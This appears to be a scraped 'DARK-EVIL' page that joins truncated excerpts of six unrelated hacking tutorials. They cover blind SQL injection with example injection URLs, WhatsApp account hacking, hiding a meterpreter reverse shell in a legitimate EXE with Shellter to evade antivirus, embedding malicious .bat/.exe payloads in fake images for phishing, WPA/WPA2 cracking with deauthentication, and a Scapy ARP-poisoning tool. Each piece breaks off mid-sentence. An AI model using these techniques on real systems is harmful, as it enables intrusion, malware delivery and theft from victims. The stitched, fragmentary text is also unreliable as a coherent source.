DARK-EVIL

While preparing for an upcoming presentation, I came across Blind SQL Injection. Following steps I found helpful and you might find it useful. There are 2 types of Blind SQL Injections: 1. Normal Blind => Where you get TRUE/FALSE responses based on output of SQL query. This is visible change in page. 2. Totally Blind => No change in output for TRUE/FALSE condition. 1. Normal Blind: Vulnerable URL: hxxp://site/page.php?id=1 TRUE Response: hxxp://site/page.php?id=1 AND 1=1 FALSE Response: hxxp://site/page.php?id=1 AND 1=2 Check Version: hxxp://site/page.php?id=1 AND substring(version(),1,1)=4 hxxp://site/page.php?id=1 AND substring(version(),1,1)=5 Database version is MySQL 5.x.x. Table & Columns: We need to guess table & column names. For this, subselect should be supported. Check subselect: hxxp://site/page.php?id=1 AND (select 1)=1 Guessing Table name: hxxp://site/page.php?id=1 AND (select 1 from admin limit 0,1)=1 hxxp://site/page.php?id=1 AND (select 1 from users...

Hacking is not a safe and legal act. In many countries hacking and spying on other’s phone are entirely banned, and it is a crime. In this article, you can see some  Whatsapp hacking tricks  and  WhatsApp hacking tips  here. But please follow this instruction at your risk because we are not responsible for anything you do. Hacking any account or anything is not an easy task because you need a lot of knowledge for it. You need some coding and programming knowledge to cut anything. So we are making it simple for you with some powerful WhatsApp hacking tips and tricks. Note: Hacking is an illegal process in some countries, So we are not responsible for anything we are providing all information for Fun Only. If you are looking for  Whatsapp Hacking Tips, Whatsapp Hacking tricks and Whatsapp Hacking process  then you are at right place here we are going to describe the real way of  Whatsapp hacking . So read this Article carefully and enjoy ha...

Welcome back! Today we’re going to be entering some new territory. When we’re attempting to compromise a system, we need to be stealthy. A part of this stealthiness is learning to evade antivirus software. To start us on this journey, we’re going to be talking about a tool called Shellter. Shellter  is a tool that allows us to inject payloads into a legitimate Windows executable (EXE) file. This injection allows us to disguise a payload as a real executable, which can drastically increase our chances of getting past antivirus. In order to demonstrate this technique, we’re going to be injecting a reverse TCP meterpreter payload into an EXE. Note:  Shellter is built for Windows, but is capable of running via  wine  in Linux. I’ll be using an  ESXi lab  to create a 32-bit Windows 7 VM to run Shellter in. Step 1: Download Shellter and Legitimate EXE For our demonstration today, we’re going to be attempting to evade the built-in Windows 7 Win...

In this article we are introducing a newly launched hacking tool “ Fake Image Exploiter ”. It is design so that it becomes easier for attackers to perform phishing or social engineering attacks by generating a fake image with hidden malicious .bat/.exe file inside it. Let’s start! Open the terminal inside your kali Linux and type following command to download it from github. Git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git Once it gets downloaded then opens the folder and selects the file “ settings ” for configuration before running the program as shown the given screenshot. Now made some changes inside setting file as shown the screenshot: Here you have to declare the type of payload extension you will use to hide it inside the image. You can set any exetension among these four : ps1, bat, txt, exe.  I had set  PAYLOAD_EXETNSION=bat  similarly set  BYPASS_RH=NO   and scroll down for next configration. In same way set ...

In this post I will tell you how to crack wpa/wpa2 wi-fi in kali linux using aircrack-ng. To do this,  first you should install kalinux or you can use live kali linux. To crack Wi-Fi,  first,  you need a computer with kali linux and a wireless card which supports monitor/injection mode. If your wireless card is not able to do this,  you need to get an external wireless card which is capable of monitor/injection mode. Apart from these tools,  you need to have a word-list to crack the password from the captured packets. First you need to understand how Wi-Fi works. Wi-Fi transmits signal in the form of packets in air so we need to capture all the packets in air so we use airodump to dump all the packets in air .After that we should see that if any one is connected to the victim Wi-Fi. If anyone is not connected the Wi-Fi, cracking is not possible as we need a wpa handshake. We can capture handshake by sending deauthentication packets to client conn...

Hello fellow hackers! Today we’re going to be building an ARP poisoner (Man in the Middle) tool. We’ve already discussed man in the middle attacks in a  previous article , but this time we’ll be scripting the attack ourselves, which should yield a greater understanding of these concepts as a whole. That being said, I still recommend you read the first man in the middle article. Now, let’s get scripting. Step 1: Importing Libraries Obviously, since we’re doing some pretty specific things here, we’re going to be importing some Python libraries. We’ll being using a popular packet-crafting library  Scapy . Let’s see the code snippet of our imports: We start with some imports from  logging . We’re going to use these imported functions to suppress the text that Scapy throws out when we import it and use its functions. After we get the logging squared away, we can import everything from Scapy. I’ve placed this entire process within a try/except block just in case the u...